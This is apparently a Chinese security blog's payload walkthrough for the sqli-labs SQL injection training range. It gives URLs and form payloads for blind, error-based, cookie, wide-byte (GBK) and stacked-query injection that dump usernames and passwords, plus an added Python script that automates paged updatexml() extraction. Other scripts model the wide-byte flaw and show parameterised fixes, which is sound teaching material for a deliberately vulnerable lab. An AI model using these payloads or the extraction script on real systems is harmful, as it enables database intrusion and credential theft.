Contents
- Preface
- Walkthrough
Preface
This article collects the payloads used to clear the corresponding levels of the sqli-labs SQL injection range; it is essentially an extension of my earlier posts on the subject. For the detailed reasoning behind each payload, see the earlier post "SQL-libs漏洞思路总结" (a summary of the sqli-labs exploitation approach). I hope readers find it refreshing and take something useful from it.
Walkthrough
SQL Level 10
http://192.168.182.30/sql/Less-10/?id=1" and sleep(5)%23
The response is delayed by about five seconds, so the injection works and the parameter is wrapped in double quotes. Nothing is reflected on this level, so everything below is time-based blind extraction.
http://192.168.182.30/sql/Less-10/?id=1" and if(length(database())=8,sleep(5),1)%23
The current database name is 8 characters long.
http://192.168.182.30/sql/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1)%23
The first character of the database name is s; repeating with offsets 2 to 8 gives security.
http://192.168.182.30/sql/Less-10/?id=1" and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(5),1)%23
The first table name starts with e and resolves to emails. This was run in Burp Intruder as a cluster bomb with two payload sets: the substr() offset (0-9) and the compared character (a-z and 0-9); the requests that take about five seconds longer give the character at each offset.
http://192.168.182.30/sql/Less-10/?id=1" and if(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1)='i',sleep(5),1)%23
The first column of emails starts with i and resolves to id.
http://192.168.182.30/sql/Less-10/?id=1" and if(substr((select username from users limit 0,1),1,1)='D',sleep(5),1)%23
The first username in users starts with D (Dumb). Raising the limit offset (limit 1,1, limit 2,1, ...) enumerates the remaining usernames. Note that under the default case-insensitive collation the comparison ='d' would match as well; compare against ascii(substr(...)) or use binary when case matters.
SQL Level 11
This level is a login form sent by POST; the wrapping character is a single quote ('). MySQL errors are echoed to the page, so updatexml() is used to leak data through the XPATH error message.
uname=admin&passwd=1' or updatexml(1,concat(0x7e,(select database()),0x7e),0)#&submit=Submit
Shows the database name: security.
uname=admin&passwd=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit
Shows the table names: emails, students, uagents, users, referers.
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0)#&submit=Submit
Shows the columns of users: username, password, id.
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(username) from (select username from users)a),0x7e),0)#&submit=Submit
Shows the usernames stored in users.
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(password) from (select password from users)a),0x7e),0)#&submit=Submit
Shows the passwords stored in users. The XPATH error message holds at most 32 characters, so a long group_concat() list is cut off; wrap the subquery in substr(..., 1, 30), substr(..., 31, 30) and so on to page through it.
SQL Level 12
Level 12 is also a POST login form; the wrapper is ") (a double quote inside parentheses).
uname=admin&passwd=1") or updatexml(1,concat(0x7e,database(),0x7e),0)#&submit=Submit
Shows the database name: security.
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit
Shows the table names: emails, students, uagents, users, referers.
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0)#&submit=Submit
Shows the columns of users: username, password, id.
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(username) from (select username from users)a),0x7e),0)#&submit=Submit
Shows the usernames stored in users.
uname=admin&passwd=1") and updatexml(1,concat(0x7e,(select group_concat(password) from (select password from users)a),0x7e),0)#&submit=Submit
Shows the passwords stored in users.
SQL Level 13
Level 13 is a POST login form as well; the wrapper is ') (a single quote inside parentheses).
uname=admin&passwd=1') or updatexml(1,concat(0x7e,database(),0x7e),0)#&submit=Submit
Shows the database name: security.
uname=admin&passwd=1') or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#&submit=Submit
Shows the table names: emails, students, uagents, users, referers.
uname=admin&passwd=1') or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0)#&submit=Submit
Shows the columns of users: username, password, id. Dumping the values works exactly as in levels 11 and 12 with this wrapper.
SQL Level 20
Level 20 assumes we already have a valid username and password. Log in, capture the request, and inject into the uname cookie; the wrapper is a single quote and query output is reflected, so a union works.
Cookie: uname=Dumb' order by 3%23
Cookie: uname=Dumb' order by 4%23
order by 3 succeeds and order by 4 errors, so the query returns three columns.
Cookie: uname=' union select 1,database(),version()%23
Database name and version (the empty uname makes the original query return nothing, so the union row is what gets displayed).
Cookie: uname=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
All table names in the current database.
Cookie: uname=' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()%23
Column names of every table in the current database; add and table_name='users' to narrow it to one table.
Cookie: uname=' union select 1,2,group_concat(username,0x3a,password) from users%23
Every username:password pair in users.
SQL Level 9 (Less-9)
http://192.168.182.30/sql/Less-9/?id=1"%23
Probing with a double quote changes nothing.
http://192.168.182.30/sql/Less-9/?id=1' and sleep(5)%23
A single quote plus sleep(5) delays the response, so the wrapper is a single quote and the level is time-based blind: the page looks the same whether the query succeeds or fails, only the timing differs.
http://192.168.182.30/sql/Less-9/?id=1' and if(length(database())=8,sleep(5),1)%23
The database name is 8 characters long.
http://192.168.182.30/sql/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(5),1)%23
It starts with s (security).
http://192.168.182.30/sql/Less-9/?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),1)%23
Cluster-bomb brute force shows the first table name is 6 characters long.
http://192.168.182.30/sql/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1)%23
Brute-forcing each offset gives the first table name: emails.
http://192.168.182.30/sql/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1)%23
Brute-forcing each offset gives the first column of emails: id.
SQL Level 22
The injection point is again the uname cookie, but this level base64-decodes the cookie before using it and wraps the value in double quotes, so each payload is Dumb" and updatexml(...)# encoded as base64 (the decoded form is given after each cookie).
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkj
Decoded: Dumb" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#  Leaks the database name.
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgdmVyc2lvbigpKSwweDdlKSwxKSM=
Decoded: Dumb" and updatexml(1,concat(0x7e,(select version()),0x7e),1)#  Leaks the database version.
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSksMHg3ZSksMCkj
Decoded: Dumb" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0)#  Leaks the table names.
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDApIw==
Decoded: Dumb" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),0)#  Leaks all column names of users.
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIChzZWxlY3QgdXNlcm5hbWUgZnJvbSB1c2VycylhKSwweDdlKSwwKSM=
Decoded: Dumb" and updatexml(1,concat(0x7e,(select group_concat(username) from (select username from users)a),0x7e),0)#  Leaks the username values in users.
Cookie: uname=RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHBhc3N3b3JkKSBmcm9tIChzZWxlY3QgcGFzc3dvcmQgZnJvbSB1c2VycylhKSwweDdlKSwwKSM=
Decoded: Dumb" and updatexml(1,concat(0x7e,(select group_concat(password) from (select password from users)a),0x7e),0)#  Leaks the password values in users. As on level 11, anything beyond 32 characters is cut off and has to be paged with substr().
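Levels 11, 12, 13 and 22 all rely on the same updatexml() error, and all of them hit MySQL's 32-character limit on the XPATH error text as soon as group_concat() returns a long list. The script below is an added example, not code from the original post: it builds the payload with a 30-character substr() window, parses the leaked text out of the error, and keeps requesting the next window until the whole value is back. The POST and base64-cookie senders cover the two transports used on these levels; the Less-22 URL and the FakeLab stand-in (canned data with MySQL's truncation reproduced) are assumptions of this example.

```python
"""Error-based extraction with updatexml(), paging past MySQL's 32-character
error limit (added example, not code from the original post).

Covers the POST levels (Less-11/12/13, payload in the passwd field) and the
base64 cookie level (Less-22). The lab URLs and FakeLab are assumptions.
"""
import base64
import re
import urllib.parse
import urllib.request

WINDOW = 30  # the XPATH error shows 32 chars; two of them are the 0x7e ('~') markers
ERR = re.compile(r"XPATH syntax error: '([^']*)'")


def updatexml_payload(prefix: str, expr: str, start: int) -> str:
    """prefix closes the original string: "1'" (Less-11), '1")' (Less-12), "1')" (Less-13), 'Dumb"' (Less-22)."""
    return (f"{prefix} and updatexml(1,concat(0x7e,"
            f"substr(({expr}),{start},{WINDOW}),0x7e),1)#")


def parse_leak(body: str):
    """Text between the '~' markers, or None if no XPATH error came back."""
    m = ERR.search(body)
    if not m:
        return None
    leaked = m.group(1)
    if leaked.startswith("~"):
        leaked = leaked[1:]
    if leaked.endswith("~"):
        leaked = leaked[:-1]
    return leaked


def dump(send, prefix: str, expr: str) -> str:
    """Fetch expr in WINDOW-sized pieces until a short piece signals the end."""
    out, start = "", 1
    while True:
        chunk = parse_leak(send(updatexml_payload(prefix, expr, start)))
        if chunk is None:
            raise RuntimeError("no XPATH error in the response: check prefix and comment")
        out += chunk
        if len(chunk) < WINDOW:
            return out
        start += WINDOW


def post_sender(url: str):
    """Less-11/12/13 transport: payload goes in the passwd field of the login form."""
    def send(payload: str) -> str:
        form = urllib.parse.urlencode(
            {"uname": "admin", "passwd": payload, "submit": "Submit"}).encode()
        return urllib.request.urlopen(url, form, timeout=10).read().decode(errors="replace")
    return send


def cookie_sender(url: str):
    """Less-22 transport: payload goes base64-encoded into the uname cookie."""
    def send(payload: str) -> str:
        cookie = "uname=" + base64.b64encode(payload.encode()).decode()
        req = urllib.request.Request(url, headers={"Cookie": cookie})
        return urllib.request.urlopen(req, timeout=10).read().decode(errors="replace")
    return send


class FakeLab:
    """Constructed stand-in for the vulnerable page: answers the payload shape
    built above from canned data and truncates the error to 32 chars like MySQL."""
    PAT = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)")

    def __init__(self, data: dict):
        self.data = data

    def send(self, payload: str) -> str:
        m = self.PAT.search(payload)
        start, width = int(m.group(2)), int(m.group(3))
        piece = self.data[m.group(1)][start - 1:start - 1 + width]
        return f"XPATH syntax error: '{('~' + piece + '~')[:32]}'"


if __name__ == "__main__":
    lab = FakeLab({
        "select database()": "security",
        "select group_concat(username) from users":
            "Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin",  # made-up rows
    })
    print(dump(lab.send, "1'", "select database()"))
    print(dump(lab.send, '1")', "select group_concat(username) from users"))
    # Live lab, for example:
    # dump(post_sender("http://192.168.182.30/sql/Less-11/"), "1'", "select database()")
    # dump(cookie_sender("http://192.168.182.30/sql/Less-22/"), 'Dumb"', "select database()")
```

The end-of-value test is the window length: a full 30-character piece means there may be more, a shorter one (or an empty one when the length is an exact multiple of 30) means the value is complete.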
SQL Level 32
This level applies when the database connection uses the GBK charset. The application escapes quotes with a backslash (addslashes style), but a preceding %df byte combines with that backslash (0xDF 0x5C) into a single GBK character, which frees the quote: wide-byte injection.
http://192.168.182.30/sql/Less-32/?id=%df%5c
A first probe for the wide-byte behaviour.
http://192.168.182.30/sql/Less-32/?id=1%df%27 and 1=1%23
http://192.168.182.30/sql/Less-32/?id=1%df%27 and 1=2%23
The two responses differ, confirming the injection: %df%27 closes the single-quote wrapper, so what follows is parsed as SQL.
http://192.168.182.30/sql/Less-32/?id=1%df%27 order by 3%23
http://192.168.182.30/sql/Less-32/?id=1%df%27 order by 2%23
Establishes the column count; the union queries below use three columns.
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,database(),version()%23
Database name and version.
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
Table names in the current database.
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
The same with the schema name given as the hex literal 0x7365637572697479 ('security'): a quoted string cannot be used because its quotes would be escaped, and a hex literal needs none.
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479%23
Column names of every table in security; add and table_name=0x7573657273 ('users') to narrow it to one table.
http://192.168.182.30/sql/Less-32/?id=-1%df%27 union select 1,2,group_concat(username,0x3a,password) from users%23
Every username:password pair in users.
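To make the wide-byte mechanism concrete, the following is an added example (not code from the original post) that models both sides of Level 32 in Python: the byte-wise escaping the lab applies, and the way MySQL's lexer then reads the string literal (a valid multibyte pair is one character, a backslash consumes the next byte). It shows why 1%df%27 breaks out under GBK but not under utf8, why a charset-aware escaper that also escapes a lone lead byte stops it, and it produces the 0x... literals used in the union payloads. The simplified multibyte rules (two-byte forms only) and the probe string are assumptions of this example.

```python
"""Wide-byte (GBK) injection modelled in Python (added example, not code from
the original post). Shows why id=1%df%27 survives addslashes() in Less-32, why
it does not under utf8, why charset-aware escaping stops it, and how the 0x...
literals in the union payloads avoid quotes entirely.
"""

SPECIALS = (0x27, 0x22, 0x5C, 0x00)  # ' " \ NUL: what PHP addslashes() escapes


def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping as in the lab; it knows nothing about the connection charset."""
    out = bytearray()
    for b in raw:
        if b in SPECIALS:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def is_lead(charset: str, b: int) -> bool:
    """Could b start a two-byte character? (two-byte forms only, a simplification)"""
    if charset == "gbk":
        return 0x81 <= b <= 0xFE
    if charset == "utf8":
        return 0xC2 <= b <= 0xDF
    raise ValueError(charset)


def is_mb_pair(charset: str, lead: int, trail: int) -> bool:
    """Do (lead, trail) form one valid two-byte character in this charset?"""
    if not is_lead(charset, lead):
        return False
    if charset == "gbk":
        return 0x40 <= trail <= 0x7E or 0x80 <= trail <= 0xFE
    return 0x80 <= trail <= 0xBF


def real_escape(raw: bytes, charset: str) -> bytes:
    """Charset-aware escaping in the spirit of mysql_real_escape_string() after
    mysql_set_charset(): a valid pair is copied whole, a lone lead byte is itself
    escaped so it can never absorb the backslash added for a following quote."""
    out, i = bytearray(), 0
    while i < len(raw):
        b = raw[i]
        if i + 1 < len(raw) and is_mb_pair(charset, b, raw[i + 1]):
            out += raw[i:i + 2]
            i += 2
            continue
        if b in SPECIALS or is_lead(charset, b):
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)


def breaks_out(escaped: bytes, charset: str) -> bool:
    """Read the escaped bytes the way MySQL's lexer reads a string literal: a
    valid multibyte pair is one character, a backslash swallows the next byte.
    True when an unescaped single quote survives, i.e. the literal closes early."""
    i = 0
    while i < len(escaped):
        b = escaped[i]
        if i + 1 < len(escaped) and is_mb_pair(charset, b, escaped[i + 1]):
            i += 2
        elif b == 0x5C:
            i += 2
        elif b == 0x27:
            return True
        else:
            i += 1
    return False


def build_query(escaped: bytes) -> bytes:
    """The statement the lab assembles around the escaped id."""
    return b"SELECT * FROM users WHERE id='" + escaped + b"' LIMIT 0,1"


def hex_literal(s: str) -> str:
    """A MySQL string as a 0x... literal, usable where quotes would be escaped."""
    return "0x" + s.encode().hex()


if __name__ == "__main__":
    probe = b"1\xdf'"  # what ?id=1%df%27 arrives as (constructed input)
    for charset in ("gbk", "utf8"):
        esc = addslashes(probe)
        print(charset, build_query(esc), "breaks out:", breaks_out(esc, charset))
    print("gbk with charset-aware escaping, breaks out:",
          breaks_out(real_escape(probe, "gbk"), "gbk"))
    print(hex_literal("security"), hex_literal("users"))
```

Under GBK the escaped bytes 31 DF 5C 27 are read as "1", one two-byte character, then a bare quote; under utf8 the 0xDF byte cannot pair with 0x5C, so the backslash still escapes the quote. The charset-aware escaper turns the probe into 31 5C DF 5C 27, where the first backslash consumes 0xDF and the second one the quote.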
SQL Level 38
http://192.168.182.30/sql/Less-38/?id=1'
The extra quote produces a MySQL error, so the wrapper is a single quote.
http://192.168.182.30/sql/Less-38/?id=1' and 1=1--+
http://192.168.182.30/sql/Less-38/?id=1' and 1=2--+
The two responses differ, confirming the injection.
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,database(),version()--+
Shows the database name and version.
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
Shows all table names in the current database.
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+
Shows the column names of every table in the current database.
http://192.168.182.30/sql/Less-38/?id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users--+
Shows every username:password pair in users, addressing the table as security.users.
http://192.168.182.30/sql/Less-38/?id=1' ;insert into users(id,username,password) values ('38','Less-38','hello')--+
This level runs stacked queries (mysqli_multi_query), so a second statement after the semicolon is executed as well: this one inserts a new row (id 38, username Less-38, password hello) into users. The output of the second statement is not displayed; re-run the union query above to see the added row.
http://192.168.182.30/sql/Less-38/?id=1' ;delete from users where id = '38' and username = 'Less-38' and password = 'hello'--+
Deletes that row again, restoring users to its original contents.
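The insert and delete payloads only work because Level 38 concatenates the input into the statement and hands it to a multi-statement API. The following is an added example, not code from the original post, that reproduces that on an in-memory SQLite copy of users: the vulnerable lookup splits and runs every statement like the lab's mysqli_multi_query and shows only the first result set, while the parameterised lookup treats the same input as a plain value. The table contents, the naive statement splitter and the decoded form of the page's two payloads (with --+ written as "-- ") are constructed for this example.

```python
"""Stacked-query injection as in Less-38, reproduced on an in-memory SQLite
copy of the users table (added example, not code from the original post). The
table rows and the naive multi-statement driver are constructed for this demo.
"""
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """A small users table with made-up rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'Dumb','Dumb'), (2,'Angelina','I-kill-you'), (8,'admin','admin');
    """)
    return con


def split_statements(sql: str):
    """Split on ';' outside single-quoted strings, as a multi-query driver would."""
    stmts, cur, in_str = [], [], False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
        if ch == ";" and not in_str:
            stmts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    stmts.append("".join(cur))
    return [s for s in stmts if s.strip()]


def multi_query(con: sqlite3.Connection, sql: str):
    """Run every statement (the lab's mysqli_multi_query) but return only the
    first result set, which is all the Less-38 page ever displays."""
    first = None
    for i, stmt in enumerate(split_statements(sql)):
        rows = con.execute(stmt).fetchall()
        if i == 0:
            first = rows
    con.commit()
    return first


def lookup_vulnerable(con: sqlite3.Connection, user_id: str):
    """Less-38 style: input concatenated into the query, multi-statement execution."""
    return multi_query(con, f"SELECT username, password FROM users WHERE id='{user_id}' LIMIT 0,1")


def lookup_safe(con: sqlite3.Connection, user_id: str):
    """Parameterised: the input is data, never SQL, and execute() runs one statement."""
    return con.execute("SELECT username, password FROM users WHERE id=? LIMIT 0,1",
                       (user_id,)).fetchall()


def row_count(con: sqlite3.Connection) -> int:
    return con.execute("SELECT count(*) FROM users").fetchone()[0]


# The page's two payloads as they reach the application (--+ decodes to "-- ").
INSERT_PAYLOAD = "1' ;insert into users(id,username,password) values ('38','Less-38','hello')-- "
DELETE_PAYLOAD = ("1' ;delete from users where id = '38' and username = 'Less-38' "
                  "and password = 'hello'-- ")

if __name__ == "__main__":
    con = fresh_db()
    print(lookup_vulnerable(con, INSERT_PAYLOAD), row_count(con))  # row for id 1 shown, table now has 4 rows
    print(lookup_vulnerable(con, "38"))                             # the injected row
    lookup_vulnerable(con, DELETE_PAYLOAD)
    print(row_count(con))                                           # back to 3
    safe = fresh_db()
    print(lookup_safe(safe, INSERT_PAYLOAD), row_count(safe))       # no match, still 3 rows
```

The point of the side-by-side is that the stacked statement is invisible in the page output either way; only the row count (or a later union query, as on the page) reveals that the insert ran, which is why stacked injection is easy to miss when you only look at the response.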